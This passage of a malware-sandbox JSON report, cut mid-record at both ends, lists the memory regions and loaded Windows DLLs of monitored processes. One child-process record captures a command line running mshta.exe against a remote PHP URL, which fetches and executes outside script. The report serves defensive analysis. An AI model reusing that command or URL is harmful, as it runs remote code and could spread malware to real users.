"size": 8192, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 31727615, "entry_point": 0, "filename": null, "id": "region_1160", "name": "pagefile_0x0000000001e40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31719424, "timestamp": "00:01:04.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 32968703, "entry_point": 32899072, "filename": "\\Windows\\System32\\C_20127.NLS", "id": "region_1168", "name": "c_20127.nls", "norm_filename": "c:\\windows\\system32\\c_20127.nls", "region_type": "memory_mapped_file", "start_va": 32899072, "timestamp": "00:01:07.045", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001169-addr_0x0000000001f80000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1169", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:01:07.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 55377920, "type": "region", "version": 1 }, "end_va": 59518975, "entry_point": 
0, "filename": null, "id": "region_1170", "name": "pagefile_0x00000000034d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 55377920, "timestamp": "00:01:07.046", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001172-addr_0x000007fffffa6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092653568, "type": "region", "version": 1 }, "end_va": 8796092661759, "entry_point": 0, "filename": null, "id": "region_1172", "name": "private_0x000007fffffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092653568, "timestamp": "00:01:07.047", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001249-addr_0x0000000002020000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_1249", "name": "private_0x0000000002020000", "norm_filename": null, "region_type": "private_memory", "start_va": 33685504, "timestamp": "00:01:07.377", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001267-addr_0x0000000003a50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": 
"process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 61145088, "type": "region", "version": 1 }, "end_va": 62193663, "entry_point": 0, "filename": null, "id": "region_1267", "name": "private_0x0000000003a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 61145088, "timestamp": "00:01:07.460", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001269-addr_0x000007fffffa4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092645376, "type": "region", "version": 1 }, "end_va": 8796092653567, "entry_point": 0, "filename": null, "id": "region_1269", "name": "private_0x000007fffffa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092645376, "timestamp": "00:01:07.462", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001277-addr_0x0000000003b50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 62193664, "type": "region", "version": 1 }, "end_va": 63242239, "entry_point": 0, "filename": null, "id": "region_1277", "name": "private_0x0000000003b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 62193664, "timestamp": "00:01:07.505", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": 
"\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_7", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00001179-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1179", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:07.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1180", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:07.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": 
"region_1181", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:07.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_1182", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:07.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1183", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:07.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1184", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:07.137", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000007-region_00001185-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1185", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:07.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 4288479232, "type": "region", "version": 1 }, "end_va": 4288544767, "entry_point": 4288490532, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_1186", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 4288479232, "timestamp": "00:01:07.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1187", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:07.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1188", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:07.147", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001189-addr_0x000007fffffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1189", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:07.147", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001190-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1190", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:07.148", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000007-region_00001191-addr_0x0000000000240000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_1191", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:07.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1192", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:07.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1193", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:07.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed 
regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1194", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:07.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1195", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:07.201", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001196-addr_0x0000000000400000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_1196", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:07.202", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001197-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": 
"proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_1197", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:07.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1198", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1199", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1200", "name": "msvcrt.dll", 
"norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1201", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:07.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1202", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:07.204", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1203", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:07.204", "type": "region", 
"version": 1 }, { "dump": { "filename": "process_00000007-region_00001204-addr_0x00000000006c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 7143423, "entry_point": 0, "filename": null, "id": "region_1204", "name": "private_0x00000000006c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7077888, "timestamp": "00:01:07.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001205-addr_0x0000000000510000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_1205", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:01:07.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791270096896, "type": "region", "version": 1 }, "end_va": 8791279108095, "entry_point": 8791270118592, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_1206", "name": "mshtml.dll", 
"norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791270096896, "timestamp": "00:01:07.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1207", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:07.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1208", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:07.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1209", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:07.241", "type": "region", "version": 1 }, { "dump": { "filename": "", 
"flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1210", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:07.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1211", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:07.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1212", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:07.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, 
"start_va": 8791768498176, "type": "region", "version": 1 }, "end_va": 8791770038271, "entry_point": 8791768502496, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1213", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791768498176, "timestamp": "00:01:07.246", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791787438080, "type": "region", "version": 1 }, "end_va": 8791788658687, "entry_point": 8791787442388, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1214", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 8791787438080, "timestamp": "00:01:07.247", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1215", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:07.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, "start_va": 8791763845120, "type": "region", "version": 1 }, "end_va": 8791766306815, "entry_point": 8791763850048, "filename": "\\Windows\\System32\\iertutil.dll", "id": 
"region_1216", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791763845120, "timestamp": "00:01:07.249", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1217", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:07.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791756374016, "type": "region", "version": 1 }, "end_va": 8791757844479, "entry_point": 8791756378304, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1218", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791756374016, "timestamp": "00:01:07.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791756046336, "type": "region", "version": 1 }, "end_va": 8791756107775, "entry_point": 8791756050464, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1219", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791756046336, "timestamp": 
"00:01:07.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791630807040, "type": "region", "version": 1 }, "end_va": 8791631048703, "entry_point": 8791630811248, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_1220", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791630807040, "timestamp": "00:01:07.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1221", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:07.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 167936, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 954367, "entry_point": 790544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1226", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:01:07.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ 
